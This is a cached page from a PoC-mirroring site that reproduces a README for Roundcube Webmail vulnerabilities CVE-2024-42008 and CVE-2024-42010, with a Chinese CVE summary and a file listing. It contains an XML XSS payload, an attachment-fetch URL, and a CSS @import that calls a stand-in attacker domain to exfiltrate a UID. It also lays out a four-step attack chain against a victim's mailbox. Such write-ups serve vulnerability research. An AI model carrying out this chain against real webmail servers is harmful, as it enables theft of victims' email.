Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-42008 PoC — Roundcube Webmail 安全漏洞

Source
https://github.com/victoni/Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC
Associated Vulnerability
Title:Roundcube Webmail 安全漏洞 (CVE-2024-42008)
Description:Roundcube Webmail是一款基于浏览器的开源IMAP客户端,它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.7及之前版本和1.6.8之前的1.6.x版本存在安全漏洞,该漏洞源于存在跨站脚本漏洞,远程攻击者可以通过带有危险Content-Type标头的恶意电子邮件附件窃取和发送受害者的电子邮件。
Description
POCof Roundcube vulnerabilities CVE-2024-42008 and CVE-2024-42010
Readme
### Proof of Concept: CVE-2024-42008 and CVE-2024-42010

This proof of concept (PoC) demonstrates the exploitation of two vulnerabilities in Roundcube Webmail that enable CSS injection and a cross-site scripting (XSS). The attack consists of two stages:

1. **XSS via malicious XML attachment (CVE-2024-42008)**
    
    Because of insufficient file upload checks, an XML file can be sent as an attachment with JavaScript code e.g.
    
    ```xml
    <something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
    	alert(origin)
    </something:script>
    ```
    
    This was a known issue and tracked as CVE-2020-13965 and the mitigation was to disable the "Open attachment" option. But the file can still be accessed through the endpoint
    
    ```
    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    ```
    
    Where UID is the unique identifier for this particular attachment in this particular mailbox (i.e. INBOX).
    ![](xss.png)
    
3. **HTML exfiltration via CSS injection (CVE-2024-42010)**
    
    When sending an email, it is possible to injection your own CSS file, when hosted in a domain that starts with `a`. Through that and a JavaScript server file that processes the requests made by the vulnerable Roundcube host, it is possible to extract the UID of the malicious XSS attachment.
    
    Import the CSS in a sent email with
    
    ```css
    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    ```
    
    Host the JS server (roundcube-css-exploit.js) that exfiltrates the UID of the malicious attachment
    ![](css.png)

**Attack Chain**
 1. Host in your domain the JavaScript server
 2. Send an email with a malicious XML attachment and import the CSS from your domain
 3. The victim opens the email and the UID gets exfiltrated
 4. Then, depending on the preferred way of the XSS delivery you can either send a second email with the attachment link or redirect the user through there.

**Source: [Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail (Sonar's Vulnerability Research Team)](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)**
File Snapshot

 [4.0K]  /data/pocs/011c8ae6a886f6dee6dec9936e8e8f055aa91f42
├── [208K]  css.png
├── [2.2K]  README.md
├── [3.1K]  roundcube-css-exploit.js
└── [ 98K]  xss.png

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.